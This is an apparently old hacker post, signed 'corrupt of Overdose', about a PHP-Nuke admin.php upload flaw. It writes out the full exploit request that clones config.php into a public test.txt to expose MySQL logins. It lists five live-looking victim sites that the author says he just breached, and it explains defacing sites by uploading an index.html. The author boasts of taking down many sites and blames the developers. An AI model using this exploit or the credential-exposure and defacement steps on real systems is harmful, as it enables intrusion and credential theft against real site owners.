PHP-Nuke, a well known PHP-based portal system which is used by thousands of sites on the internet still cannot keep its security factor up.  They have done a lot of security fixes in the past, but a lot of sites are not up to date on all the updates, thus becoming targets for hackers who know PHP-Nuke's weak points.

Here is one of the security flaws, which can be done on some nuke sites:

admin.php?upload=1&file=config.php&file_name=test.txt&wd%20ir=&userfile=config.php&userfile_name=test.txt

This will basically clone the config.php file as a text file on the server.  If all goes well and everything is CHMODed correctly, you will be able to go to http://www.sitelocation.com/test.txt and view their config.php, which contains sensitive MySql information.  It will display their MySql login and password on most circumstances, which is 70% of the time their root login/pass.  I took advantage of this bug and took down a lot of sites.  Here are some examples of what will happen after you clone their config.php:

http://kauai.net/html/test.txt
http://www.pdltd.com/test.txt
http://csc.dhs.org/test.txt
http://www.spyndle.com/test.txt
http://www.camp4.com/test.txt

There is some I did a few minutes ago, just to show you how its done.  This is a very valuable method, but at what price?  Would the government call this loophole hacking?  The php nuke authors shouldn't have half assed their coding and allow this to happen.  They should be to blame, not us.

Here is another thing I found.  If you cannot get root onto the site, there are some things you can do.  If your at the upload screen after doing the method shown above, you can upload files usually.  On most servers, index.html will open before index.php, so for another effective method site defacement just upload index.html onto the server, and the web address will go to that instead of the one with a php extension.  This does tend to vary on some servers, but I have only seen one or two that it does on.

Enough.
--corrupt of Overdose